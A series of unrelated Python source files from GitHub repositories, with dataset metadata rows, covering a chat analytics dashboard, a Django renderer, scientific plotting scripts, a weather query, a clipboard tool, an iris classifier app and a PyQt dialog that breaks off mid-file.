    author_value_counts = df['author'].value_counts().to_frame()
    fig0 = px.bar(author_value_counts, y='author', x=author_value_counts.index, color='author', color_continuous_scale='Tealgrn', labels={'index': 'Employees', 'author': 'Overall Participation'}, title="Employees Team Interaction")
    st.plotly_chart(fig0)
    # --- Message volume grouped by a user-selected time key -----------------
    sort_type = st.selectbox("Sort By:", ["Date", "Day", "Time", "Month"])
    if sort_type == "Date":
        keyword = "date"
    elif sort_type == "Day":
        keyword = "day"
    elif sort_type == "Time":
        keyword = "time"
    elif sort_type == "Month":
        keyword = "month"
    sort_df = messages_df.groupby(keyword).sum()
    sort_df['MessageCount'] = messages_df.groupby(keyword).size().values
    sort_df.reset_index(inplace=True)
    fig = px.line(sort_df, x=keyword, y="MessageCount", title=f"Overall Number of Messages according to {keyword}",)
    fig.update_xaxes(nticks=20, showgrid=False)
    st.plotly_chart(fig)
    # --- Involvement table: share, verdict and monthly trend per author -----
    author_df = df["author"].value_counts().reset_index()
    author_df.rename(columns={"index": "author", "author": "Number of messages"}, inplace=True)
    author_df["Total %"] = round(author_df["Number of messages"]*100/df.shape[0], 2)
    # `talkativeness` and `trendline` come from the local helper module.
    author_df["Involvement"] = author_df["Total %"].apply(lambda x: talkativeness(x, df["author"].nunique()))
    t_author_df = df.copy()
    t_author_df["year"] = t_author_df["date"].apply(lambda x: x.year)
    t_author_df["month"] = t_author_df["date"].apply(lambda x: x.strftime("%b"))
    months = ['Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct', 'Nov', 'Dec']
    # Categorical month keeps chronological rather than alphabetical order.
    t_author_df['month'] = pd.Categorical(t_author_df['month'], months)
    # Message count per (month, year) per author.
    analysis_1_df = t_author_df.pivot_table(index=["month", "year"], columns=["author"], values=["message"], aggfunc="count", fill_value=0)
    analysis_1_df.columns = [col_[1] for col_ in analysis_1_df.columns]
    analysis_1_df = analysis_1_df.reset_index().sort_values(["year", "month"])
    analysis_1_df["month_year"] = analysis_1_df.apply(lambda x: x["month"] + " " + str(x["year"]), axis=1)
    analysis_1_df.drop(["month", "year"], axis=1, inplace=True)
    analysis_1_df.set_index('month_year', inplace=True)
    author_df["Trend"] = author_df["author"].apply(lambda x: trendline(analysis_1_df[x]))
    st.write('Overall Team Involvement Trend', author_df)
    # --- Per-participant drill-down -----------------------------------------
    # emoji distribution
    senders = st.selectbox("Select participant:", messages_df.author.unique())
    dummy_df = messages_df[messages_df['author'] == senders]
    # Individual Line chart
    dummy_df1 = dummy_df.groupby(keyword).sum()
    dummy_df1['MessageCount'] = dummy_df.groupby(keyword).size().values
    dummy_df1.reset_index(inplace=True)
    # NOTE(review): this chart plots `sort_df` (all authors), not `dummy_df1`
    # — the per-sender counts computed above are never shown. Confirm intent.
    fig2 = px.line(sort_df, x=keyword, y="MessageCount", title=f"Overall Involvement of {senders} in {keyword} wise",)
    fig2.update_xaxes(nticks=20, showgrid=False)
    st.plotly_chart(fig2)
    # Emoji frequency pie for the selected sender.
    total_emojis_list = list([a for b in dummy_df.emoji_used for a in b])
    emoji_dict = dict(Counter(total_emojis_list))
    emoji_dict = sorted(emoji_dict.items(), key=lambda x: x[1], reverse=True)
    author_emoji_df = pd.DataFrame(emoji_dict, columns=['emoji', 'count'])
    fig5 = px.pie(author_emoji_df, values='count', names='emoji', title=f'Emoji Distribution for {senders}')
    fig5.update_traces(textposition='inside', textinfo='percent+label', showlegend=False)
    st.plotly_chart(fig5)
    # Build a single lower-cased text blob for the word cloud.
    comment_words = ''
    for val in dummy_df.message:
        # typecaste each val to string
        val = str(val)
        # split the value
        tokens = val.split()
        # Converts each token into lowercase
        for i in range(len(tokens)):
            tokens[i] = tokens[i].lower()
        comment_words += " ".join(tokens)+" "
    wordcloud = WordCloud(width=800, height=800,
                          background_color='black',
                          stopwords=stopwords, min_font_size=6).generate(comment_words)
    # plot the WordCloud image
    with st.expander("Tap to View Wordcloud"):
        fig, ax = plt.subplots(figsize=(10, 10), facecolor='k')
        ax.imshow(wordcloud, interpolation='bilinear')
        ax.axis("off")
        plt.tight_layout(pad=0)
        st.pyplot(fig)
    # --- Sentiment: translate in parallel, then score with VADER ------------
    senti = []
    with st.spinner(f'Analyzing Sentiment for {senders}.. (This may take some time depending on size of data)'):
        try:
            translation = pool.map(translate_request, dummy_df["message"].values)
        except Exception as e:
            raise e
        pool.close()
        pool.join()
        for i in translation:
            if i != None:
                sentiment_dict = sid_obj.polarity_scores(i)
                # Standard VADER compound thresholds (+/-0.05).
                if sentiment_dict['compound'] >= 0.05:
                    senti.append("Positive")
                elif sentiment_dict['compound'] <= - 0.05:
                    senti.append("Negative")
                else:
                    senti.append("Neutral")
        all_sents = Counter(senti)
        fig6 = px.bar(y=all_sents.values(), x=all_sents.keys(), color=all_sents.keys(), color_discrete_sequence=['green', 'blue', 'red'], labels={'x': 'Sentiment', 'y': 'Interaction'}, title=f"Sentiments for {senders}")
        fig6.update_layout(showlegend=False)
        st.plotly_chart(fig6)
        # Dominant sentiment label for the summary line.
        result = max(all_sents, key=all_sents.get)
        st.info(f"{senders} mostly conveys {result} behaviour")
    st.write("\n")
    # Dead code kept by the author for reference (never executed).
    """
    # This code was made for testing purpose only
    if st.checkbox(f"Click to check score for the {senders} (Out of 100)"):
        score_df = messages_df[messages_df['author'] == senders]
        score_df['MessageCount'] = score_df.shape[0]
        if score_df[(score_df['MessageCount'] > 400)].shape[0] > 0:
            st.write(f"Score for {senders}: ",random.randint(80,100))
        elif score_df[(score_df['MessageCount'] > 300) & (score_df['MessageCount'] < 400)].shape[0] > 0:
            st.write(f"Score for {senders}: ",random.randint(70,80))
        elif score_df[(score_df['MessageCount'] > 200) & (score_df['MessageCount'] < 300)].shape[0] > 0:
            st.write(f"Score for {senders}: ",random.randint(60,70))
        elif score_df[(score_df['MessageCount'] > 100) & (score_df['MessageCount'] < 200)].shape[0] > 0:
            st.write(f"Score for {senders}: ",random.randint(50,60))
        else:
            st.write(f"Score for {senders}: ",random.randint(40,50))
    """
# Footer, rendered whether or not a chat file was uploaded.
st.markdown(' <br><br><center>Developed and Maintained by <b><a href="https://www.linkedin.com/in/anantarun" target="_blank">Anant Arun</a></b></center>', unsafe_allow_html=True)
| RawRapter/Chat-Analytics-Dashboard | chat_analyze.py | chat_analyze.py | py | 11,100 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "streamlit.set_page_config",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "streamlit.markdown",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "streamlit.title",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "streamli... |
37760975497 | from rest_framework import renderers
from teslacoil.encoders import TeslaEncoder
class TeslaRenderer(renderers.JSONRenderer):
    """JSON renderer that wraps the payload with the view's model-admin metadata."""

    encoder_class = TeslaEncoder

    def render(self, data, accepted_media_type=None, renderer_context=None):
        """Wrap `data` in a {'meta': ..., 'objects': ...} envelope and
        delegate the JSON encoding to the parent renderer."""
        # Fix: removed unused locals `model` and `request`, which were
        # fetched from renderer_context but never read.
        model_admin = renderer_context['view'].model_admin
        response_wrapper = {
            'meta': model_admin,
            'objects': data,
        }
        return super(TeslaRenderer, self).render(
            response_wrapper, accepted_media_type, renderer_context)
| celerityweb/django-teslacoil | teslacoil/renderers.py | renderers.py | py | 614 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "rest_framework.renderers.JSONRenderer",
"line_number": 5,
"usage_type": "attribute"
},
{
"api_name": "rest_framework.renderers",
"line_number": 5,
"usage_type": "name"
},
{
"api_name": "teslacoil.encoders.TeslaEncoder",
"line_number": 7,
"usage_type": "name... |
from numpy import genfromtxt,linspace, meshgrid,c_,where
from mudpy.view import plot_grd
from matplotlib import pyplot as plt
from scipy.interpolate import griddata

# Script: compute the mean interplate locking inside the 1 m slip contour of a
# Melinka-earthquake slip inversion, then plot the locking values.
# Slip-model columns: 1-2 are lon/lat, 8-9 are the two slip components
# (presumably strike/dip slip -- TODO confirm against the .inv.total format).
fault=genfromtxt('/Users/dmelgar/Slip_inv/Melinka_usgs/output/inverse_models/models/gsi_vr2.6.0011.inv.total')
grdfile='/Users/dmelgar/code/GMT/Melinka/lock.grd'
# Read the locking grid (coordinates + values) without flipping longitudes.
Xlock,Ylock,lock=plot_grd(grdfile,[0,1],plt.cm.magma,flip_lon=False,return_data=True)
#Interpolate
# Regular 100x100 lon/lat grid covering the rupture area.
x=linspace(-75,-73,100)
y=linspace(-44,-42,100)
X,Y=meshgrid(x,y)
# Total slip magnitude interpolated onto the regular grid (0 outside the fault).
z = griddata(fault[:,1:3], (fault[:,8]**2+fault[:,9]**2)**0.5, (X, Y), method='linear',fill_value=0)
#get 1m contour
plt.contour(x, y, z,levels=[1,2,3,4,5,6],lw=0.5)
cs=plt.contour(x, y, z,levels=[1],lw=10)
plt.xlim([-75,-73])
plt.ylim([-44,-42])
# The second path of the 1 m contour is taken as the closed polygon of
# interest (path index 1 is model-specific -- verify for other inversions).
path=cs.collections[0].get_paths()
p=path[1]
# All grid nodes of the locking model as (lon, lat) pairs.
points=c_[Xlock.ravel(),Ylock.ravel()]
i=where(p.contains_points(points)==True)[0]
# Mean locking over the grid nodes that fall inside the contour.
m=lock.ravel()[i].mean()
plt.title('Mean locking inside 1m contour is %.2f' % (m))
plt.figure()
plt.scatter(points[i,0],points[i,1],c=lock.ravel()[i],lw=0,vmin=0,vmax=1.0,cmap=plt.cm.magma)
plt.colorbar()
plt.title('Locking inside 1m contour')
plt.xlim([-75,-73])
plt.ylim([-44,-42])
plt.show()
{
"api_name": "numpy.genfromtxt",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "mudpy.view.plot_grd",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.cm",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "matplotli... |
5216881963 | #!/usr/bin/env python3
import sys
from functools import reduce
import math
def sum(nums):
    """Return the sum of *nums* (0 for an empty sequence).

    NOTE: intentionally keeps the name ``sum`` (it shadows the builtin)
    because the other functions in this file call it.  Implemented with a
    plain accumulator instead of ``reduce`` + lambda for clarity.
    """
    total = 0
    for value in nums:
        total += value
    return total
def avg(nums):
    """Arithmetic mean of *nums*; raises ZeroDivisionError on empty input."""
    count = len(nums)
    return sum(nums) / count
def stddev(nums):
    """Return the sample standard deviation of *nums*.

    Uses the (n - 1) denominator (Bessel's correction); requires at least
    two values, otherwise a ZeroDivisionError occurs.

    The original recomputed the mean once per element inside ``reduce``
    (O(n^2)); the mean is now computed once and the squared deviations are
    summed with ``math.fsum`` for better float accuracy.
    """
    mean = sum(nums) / len(nums)
    numerator = math.fsum((x - mean) ** 2 for x in nums)
    return math.sqrt(numerator / (len(nums) - 1))
def summary(filename):
    """Read *filename* and return (sum, average, stddev) of its numeric lines.

    Lines that cannot be parsed as floats are skipped silently.
    """
    values = []
    with open(filename, 'r') as handle:
        for row in handle:
            try:
                values.append(float(row))
            except ValueError:
                pass
    return (sum(values), avg(values), stddev(values))
def main():
    """Print sum/average/stddev for every file named on the command line."""
    filenames = sys.argv[1:]
    for f in filenames:
        s = summary(f)  # (sum, average, stddev) tuple
        print(f'File: {f} Sum: {s[0]:.6f} Average: {s[1]:.6f} Stddev: {s[2]:.6f}')
if __name__ == "__main__":
main()
| lawrencetheabhorrence/Data-Analysis-2020 | hy-data-analysis-with-python-2020/part02-e05_summary/src/summary.py | summary.py | py | 759 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "functools.reduce",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "functools.reduce",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "math.sqrt",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_numbe... |
34983405141 | #!/usr/bin/env python3
import pyowm
from pyowm.exceptions import OWMError
import sys, argparse
from datetime import datetime
import os
#os.environ['OPENWEATHER_API_KEY'] = 'aa1ab6974298fc6bf7303d6a22e073f9'
#os.environ['CITY_NAME'] = 'Honolulu'
def main(argv):
    """Query OpenWeatherMap for the current weather and print one log line.

    Credentials and location come from the OPENWEATHER_API_KEY and CITY_NAME
    environment variables (a KeyError is raised if either is missing).
    """
    parser = argparse.ArgumentParser()
    # NOTE(review): the -k/-p flags are parsed but never read -- the
    # environment variables win.  Confirm whether the flags should override.
    parser.add_argument('-k', required=False, metavar='your_api_key')
    parser.add_argument('-p', required=False, metavar='\"Some Place,US\"')
    args = parser.parse_args()
    api_key = str(os.environ['OPENWEATHER_API_KEY'])
    place = str(os.environ['CITY_NAME'])
    print ('Using key ' + api_key + ' to query temperature in \"' + place + '\"...' )
    owm = pyowm.OWM(api_key)
    try:
        observation = owm.weather_at_place(place)
    except OWMError as err:
        # Network/API failure: report the error and exit non-zero.
        print (err)
        sys.exit(2)
    w = observation.get_weather()
    p = observation.get_location()
    # Emit a single key=value log line: city, description, temperature, humidity.
    print ( 'source=openweathermap ' + 'city=' + '"' + p.get_name() + '"' + ' description=' + '"' + str(w.get_status()) + '"' + \
        ' temp=' + str(w.get_temperature('celsius')['temp']) +'C' + ' humidity=' + str(w.get_humidity()) )
if __name__ == "__main__":
main(sys.argv[1:])
| vasooo/pannet | exercise_1/getweather.py | getweather.py | py | 1,169 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.environ",
"line_number": 20,
"usage_type": "attribute"
},
{
"api_name": "pyowm.OWM",
... |
16098074633 | from selenium import webdriver
from webdriver_manager.firefox import GeckoDriverManager # The Webdriver
import pyautogui # To Click
import time # To wait and all
custom_site = input("Enter The Website to Download Video...") # Take the youtube video link as the input
driver = webdriver.Firefox(executable_path=GeckoDriverManager().install()) # installs the webdriver.
cus = custom_site.find('y') # Finds 'Y' in the Link.
suc = custom_site[0:cus] # Slices upto but not includes y
final_website = suc + 'ss' + custom_site[cus:] # WIth the help of string concatenation it adds ss to the
# link before the letter 'y'
web = driver.get(final_website) # Uses the Selenium Web driver to go to the website.
driver.implicitly_wait(5) # Waits For 5 Secs
driver.find_element_by_xpath(r'/html/body/div[1]/div[1]/div[2]/div[4]/div/div[1]/div[2]/div[2]/div[1]/a').click()
# Finds the download button by x path
# Often after clicking the download button the new tab gets open automatically.
# If a new tab gets open it closes that tab.
# You Can Run the below program in your terminal to get the live position of your mouse
# import pyautogui
# pyautogui.displayMousePosition()
def new_tab_cut():
    """Close the browser tab that the download site may auto-open.

    Moves the mouse to hard-coded screen coordinates (the tab's close
    button) and clicks; adjust x/y for your own screen resolution.
    """
    x = 504  # change the x coordinate to match your screen layout
    y = 48  # change the y coordinate to match your screen layout
    pyautogui.moveTo(x, y, duration=1.2)
    pyautogui.click(x, y)
# The Following block of code is used to click on the download button in firefix browser.
def save_file():
    """Click through Firefox's download dialog (save, then confirm).

    All coordinates are hard-coded for one screen layout; run
    pyautogui.displayMousePosition() to find values for your setup.
    """
    x1 = 504  # position of the "Save File" option in the dialog
    y1 = 471
    pyautogui.moveTo(x1, y1, duration=1)
    pyautogui.click(x1, y1)
    time.sleep(1)  # give the dialog time to react
    x2 = 916  # position of the confirmation (OK) button
    y2 = 575
    pyautogui.click(x2, y2)
    time.sleep(1)
new_tab_cut()
save_file()
time.sleep(100)
driver.quit()
print("Downloaded")
# executable_path=GeckoDriverManager().install() | JhaRishikesh/Projects | YouTube Downloader.py | YouTube Downloader.py | py | 1,902 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "selenium.webdriver.Firefox",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "selenium.webdriver",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "webdriver_manager.firefox.GeckoDriverManager",
"line_number": 6,
"usage_type": "call"
},
... |
import pyperclip, shelve, sys

# Multi-clipboard: save and recall named clipboard snippets via a shelf file.
# Usage:
#   python bufer.py save <keyword>   - store the current clipboard under <keyword>
#   python bufer.py list             - copy the list of stored keywords
#   python bufer.py <keyword>        - copy the stored text back to the clipboard
mcbShelf = shelve.open('mcb')
# Save the clipboard contents under the given keyword.
if len(sys.argv)==3 and sys.argv[1].lower() == 'save':
    mcbShelf[sys.argv[2]] = pyperclip.paste()
    print(sys.argv)
elif len(sys.argv) == 2:
    if sys.argv[1].lower() == 'list':
        # Copy (and print) all stored keywords.
        pyperclip.copy(str(list(mcbShelf.keys())))
        print(str(list(mcbShelf.keys())))
    elif sys.argv[1] in mcbShelf:
        # Recall: push the stored text back onto the clipboard.
        t=mcbShelf[sys.argv[1]]
        pyperclip.copy(t)
        print(mcbShelf[sys.argv[1]])
mcbShelf.close()
| alex3287/PyCharmProjects | a_b_s/bufer.py | bufer.py | py | 555 | python | ru | code | 1 | github-code | 36 | [
{
"api_name": "shelve.open",
"line_number": 3,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 7,
"usage_type": "attribute"
},
{
"api_name": "sys.argv",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "pyperclip.paste",
"line_numb... |
33293843048 | import pandas as pd
import requests
from io import StringIO
import plotly.express as px
import plotly.graph_objects as go
import seaborn as sns
import streamlit as st
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.tree import DecisionTreeClassifier
import numpy as np
from matplotlib.colors import ListedColormap
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn.datasets import make_moons, make_circles, make_classification
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
@st.cache
def split_data(df):
    """Split the iris dataframe into train/test feature and label arrays.

    Returns (X_train, X_test, y_train, y_test) with a fixed 70/30 split
    (random_state=1) so results are reproducible across streamlit reruns.
    """
    features= df[['sepal.length', 'sepal.width', 'petal.length', 'petal.width']].values
    labels = df['variety'].values
    return train_test_split(features, labels, train_size=0.7, random_state=1)
def getData():
    """Collect the four iris measurements from sliders; return a (1, 4) array."""
    SL = st.slider("Sepal length", 2,25, 3)
    SW = st.slider("Sepal width", 2,25, 3)
    PL = st.slider("Petal length", 2,25, 3)
    PW = st.slider("Petal width", 2,25, 3)
    print(f"LOG: the prediction input is: {[SL, SW, PL, PW]}")
    # reshape(1, -1): sklearn predict() expects a 2-D (n_samples, n_features) array
    return np.array([SL, SW, PL, PW]).reshape(1,-1)
def main(df):
    """Train the selected classifier on the iris split, report accuracy and
    the confusion matrix, then classify a user-supplied sample.

    The original had one near-identical copy-pasted branch per algorithm,
    and the selectbox option "GaussianPro00cessClassifier" (typo) could
    never match its `elif "GaussianProcessClassifier"` branch, making that
    classifier unreachable.  Both issues are fixed by dispatching through a
    factory dict; the evaluation pipeline itself is unchanged.
    """
    X_train, X_test, y_train, y_test = split_data(df)
    # Algorithm name -> zero-argument factory producing a fresh estimator,
    # in the same order the original selectbox listed them.
    factories = {
        "Decision Tree": lambda: DecisionTreeClassifier(),
        "Support Vector Machine": lambda: SVC(),
        "KNeighborsClassifier": lambda: KNeighborsClassifier(3),
        "Linear SVC": lambda: SVC(kernel="linear", C=0.025),
        "SVC": lambda: SVC(gamma=2, C=1),
        "GaussianProcessClassifier": lambda: GaussianProcessClassifier(1.0 * RBF(1.0)),
        "DecisionTreeClassifier": lambda: DecisionTreeClassifier(max_depth=5),
        "RandomForestClassifier": lambda: RandomForestClassifier(max_depth=5, n_estimators=10, max_features=1),
        "MLPClassifier": lambda: MLPClassifier(alpha=1, max_iter=1000),
        "AdaBoostClassifier": lambda: AdaBoostClassifier(),
        "GaussianNB": lambda: GaussianNB(),
        "QuadraticDiscriminantAnalysis": lambda: QuadraticDiscriminantAnalysis(),
    }
    classifier = st.selectbox('Which algorithm?', list(factories.keys()))
    clf = factories[classifier]()
    clf.fit(X_train, y_train)
    # Same reporting pipeline the original repeated in every branch.
    acc = clf.score(X_test, y_test)
    st.write('Accuracy: ', acc)
    predictions = clf.predict(X_test)
    cm = confusion_matrix(y_test, predictions)
    st.write('Confusion matrix: ', cm)
    sample = getData()
    st.write('The classification is: ', clf.predict(sample)[0])
@st.cache
def loadData():
    """Download the iris CSV from Google Drive and return it as a DataFrame.

    The share URL is rewritten into a direct-download URL before fetching.
    """
    orig_url = "https://drive.google.com/file/d/1qgGPtbVk7dUBZxF-Q-F_xP-jMmAh11pV/view?usp=sharing"
    file_id = orig_url.split('/')[-2]  # the file id sits second-to-last in the path
    dwn_url='https://drive.google.com/uc?export=download&id=' + file_id
    url = requests.get(dwn_url).text
    csv_raw = StringIO(url)
    dfs = pd.read_csv(csv_raw)
    return dfs
df = loadData()
st.title('Iris')
if st.checkbox('Show dataframe'):
st.write(df)
st.subheader('Scatter plot')
species = st.multiselect('Show iris per variety?', df['variety'].unique())
if not species:
species = df['variety'].unique()
col1 = st.selectbox('Which feature on x?', df.columns[0:4])
col2 = st.selectbox('Which feature on y?', df.columns[0:4])
if col1 == col2:
col1 = df.columns[1]
col2 = df.columns[0]
new_df = df[(df['variety'].isin(species))]
st.write(new_df)
# create figure using plotly express
fig = px.scatter(new_df, x =col1,y=col2, color='variety')
# Plot!
st.plotly_chart(fig)
st.subheader('Histogram')
feature = st.selectbox('Which feature?', df.columns[0:4])
# Filter dataframe
new_df2 = df[(df['variety'].isin(species))][feature]
fig2 = px.histogram(new_df, x=feature, color="variety", marginal="rug")
st.plotly_chart(fig2)
st.subheader('Machine Learning models')
main(df) | Tudor1415/mlsandbox | main.py | main.py | py | 8,562 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "streamlit.cache",
"line_number": 33,
"usage_type": "attribute"
},
{
"api_name": "streamlit.slider",
"line_number": 41,
"usage_type": "call"
},
{
"ap... |
14075716492 | import matplotlib
matplotlib.rc('text', usetex = True)
from pylab import *
import os
#Use the dt distributions from Crescent City
#tide gauge to make example plots
d = loadtxt('cumulative_probs.yearly.100.txt')
figure(1,(12,9))
clf()
axes((.1,.1,.8,.38))
#Add 1.13 to get s referenced to MSL
s = d[:,0] - 2. +1.13
plot([-2.6,0.6,0.6,1.0],[1,1,0,0],'k')
for i in [7,6,5,3,1]:
plot(s,d[:,i])
legend(['dt = infinity','dt = 24 hours', 'dt = 12 hours', 'dt = 4 hours', \
'dt = 2 hour', 'dt = 0'],'lower left')
title('Cumulative Distributions for dt-Method',fontsize=18)
plot([-1.08,-1.08,-3],[1.05,0.776,0.776],'r--',linewidth=3)
plot([-1.08],[0.776],'ro')
text(-2.8,0.8,'desired probability',fontsize=17)
ylim(-0.1,1.1)
xticks([-2,-1,0,0.6,1.],['MLW','MSL','MHW','HHW',r'${\bf \hat{\xi}}$'],fontsize=18)
yticks(fontsize=18)
ylabel('probability ',fontsize=18)
xlabel(r'tide stage ${\bf \hat{\xi}}$',fontsize=18)
axes((.1,.55,.8,.38))
s = linspace(-3,0.6,101)
def h(s):
    """Piecewise quantity-of-interest curve.

    Returns 0 where s < -1.4, else (s + 1.4) + (s + 1.6)**2.
    """
    value = (s + 1.4) + (s + 1.6) ** 2
    return where(s < -1.4, 0, value)
srun = linspace(-2.,0,6)
plot([-1.4],[0.0],'bo')
plot(srun,h(srun),'bo')
#Now plot the black line
srun2=zeros(9)
srun2[0]=-3.; srun2[1:3]=srun[0:2]; srun2[3]=-1.4; srun2[4:8]=srun[2:6];
srun2[8]=.6;
plot(srun2,h(srun2),'k')
plot([-3,-1.08,-1.08],[0.59,0.59,-0.5],'r--',linewidth=3)
ylim(-0.5,5)
xticks([-2,-1,0,0.6,1.],['MLW','MSL','MHW','HHW',r'${\bf \hat{\xi}}$'],fontsize=18)
yticks([0,2,4],['0','1','2'],fontsize=18)
plot([-1.08],[0.59],'ro')
text(-2.8,0.8,r'exceedance level ${\bf \zeta_i}$',fontsize=17)
text(-1.2,-.45,r'${\bf \hat{\xi_i}}$',fontsize=15)
xlim(-3,1)
ylabel(r'Quantity of Interest ${\bf \zeta}$',fontsize=18)
title(r"${\bf E_{jk}}$'s GeoClaw Simulation Curve at one Location",fontsize=18)
savefig('tidepofzeta_dt.png')
| rjleveque/pattern-method-paper | programs/tidepofzeta_dt.py | tidepofzeta_dt.py | py | 1,796 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "matplotlib.rc",
"line_number": 2,
"usage_type": "call"
}
] |
37662096318 | from PyQt5.QtWidgets import QLineEdit, QToolButton, QWidget, QFileDialog, QDialog, QTreeWidget, QRadioButton, QTreeWidgetItem, QTabWidget, QLabel, QCheckBox, QPushButton, QMessageBox
from pulse.utils import error
from os.path import basename
from PyQt5.QtGui import QIcon
from PyQt5.QtGui import QColor, QBrush
from PyQt5.QtCore import Qt
from PyQt5 import uic
import configparser
import os
from pulse.postprocessing.plot_acoustic_data import get_acoustic_frf
import matplotlib.pyplot as plt
import numpy as np
class SnaptoCursor(object):
    """Crosshair cursor for a matplotlib axes that snaps to the plotted data.

    Connect ``mouse_move`` to the canvas 'motion_notify_event'; the marker
    and cross-hair lines then follow the data point nearest the pointer.
    """
    def __init__(self, ax, x, y, show_cursor):
        # ax: target axes; x, y: data arrays the cursor snaps to
        # (x is assumed sorted ascending -- searchsorted relies on it);
        # show_cursor: when False the instance is inert.
        self.ax = ax
        self.x = x
        self.y = y
        self.show_cursor = show_cursor
        if show_cursor:
            self.vl = self.ax.axvline(x=x[0], color='k', alpha=0.3, label='_nolegend_') # the vertical line
            self.hl = self.ax.axhline(y=y[0], color='k', alpha=0.3, label='_nolegend_') # the horizontal line
            self.marker, = ax.plot(x[0], y[0], markersize=4, marker="s", color=[0,0,0], zorder=3)
            # self.marker.set_label("x: %1.2f // y: %4.2e" % (self.x[0], self.y[0]))
            # plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
    def mouse_move(self, event):
        """Snap the cross-hair and marker to the data point nearest event.xdata."""
        if self.show_cursor:
            if not event.inaxes: return
            x, y = event.xdata, event.ydata
            # Ignore pointer positions beyond the data range
            # (searchsorted would return an out-of-range index).
            if x>=np.max(self.x): return
            indx = np.searchsorted(self.x, [x])[0]
            x = self.x[indx]
            y = self.y[indx]
            self.vl.set_xdata(x)
            self.hl.set_ydata(y)
            self.marker.set_data([x],[y])
            self.marker.set_label("x: %1.2f // y: %1.2f" % (x, y))
            # Refresh the legend so it shows the current cursor coordinates.
            plt.legend(handles=[self.marker], loc='lower left', title=r'$\bf{Cursor}$ $\bf{coordinates:}$')
            self.ax.figure.canvas.draw_idle()
class PlotAcousticFrequencyResponseInput(QDialog):
def __init__(self, mesh, analysisMethod, frequencies, solution, list_node_ids, *args, **kwargs):
super().__init__(*args, **kwargs)
uic.loadUi('pulse/uix/user_input/ui/plotAcousticFrequencyResponseInput.ui', self)
icons_path = 'pulse\\data\\icons\\'
self.icon = QIcon(icons_path + 'pulse.png')
self.setWindowIcon(self.icon)
self.userPath = os.path.expanduser('~')
self.save_path = ""
self.mesh = mesh
self.analysisMethod = analysisMethod
self.frequencies = frequencies
self.solution = solution
self.nodeID = 0
self.imported_data = None
self.writeNodes(list_node_ids)
self.lineEdit_nodeID = self.findChild(QLineEdit, 'lineEdit_nodeID')
self.radioButton_plotAbs = self.findChild(QRadioButton, 'radioButton_plotAbs')
self.radioButton_plotReal = self.findChild(QRadioButton, 'radioButton_plotReal')
self.radioButton_plotImag = self.findChild(QRadioButton, 'radioButton_plotImag')
self.radioButton_plotAbs.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotReal.clicked.connect(self.radioButtonEvent_YAxis)
self.radioButton_plotImag.clicked.connect(self.radioButtonEvent_YAxis)
self.plotAbs = self.radioButton_plotAbs.isChecked()
self.plotReal = self.radioButton_plotReal.isChecked()
self.plotImag = self.radioButton_plotImag.isChecked()
self.lineEdit_FileName = self.findChild(QLineEdit, 'lineEdit_FileName')
self.lineEdit_ImportResultsPath = self.findChild(QLineEdit, 'lineEdit_ImportResultsPath')
self.lineEdit_SaveResultsPath = self.findChild(QLineEdit, 'lineEdit_SaveResultsPath')
self.toolButton_ChooseFolderImport = self.findChild(QToolButton, 'toolButton_ChooseFolderImport')
self.toolButton_ChooseFolderImport.clicked.connect(self.choose_path_import_results)
self.toolButton_ChooseFolderExport = self.findChild(QToolButton, 'toolButton_ChooseFolderExport')
self.toolButton_ChooseFolderExport.clicked.connect(self.choose_path_export_results)
self.toolButton_ExportResults = self.findChild(QToolButton, 'toolButton_ExportResults')
self.toolButton_ExportResults.clicked.connect(self.ExportResults)
self.toolButton_ResetPlot = self.findChild(QToolButton, 'toolButton_ResetPlot')
self.toolButton_ResetPlot.clicked.connect(self.reset_imported_data)
self.radioButton_Absolute = self.findChild(QRadioButton, 'radioButton_Absolute')
self.radioButton_Real_Imaginary = self.findChild(QRadioButton, 'radioButton_Real_Imaginary')
self.radioButton_Absolute.clicked.connect(self.radioButtonEvent_save_data)
self.radioButton_Real_Imaginary.clicked.connect(self.radioButtonEvent_save_data)
self.save_Absolute = self.radioButton_Absolute.isChecked()
self.save_Real_Imaginary = self.radioButton_Real_Imaginary.isChecked()
self.tabWidget_plot_results = self.findChild(QTabWidget, "tabWidget_plot_results")
self.tab_plot = self.tabWidget_plot_results.findChild(QWidget, "tab_plot")
self.pushButton_AddImportedPlot = self.findChild(QPushButton, 'pushButton_AddImportedPlot')
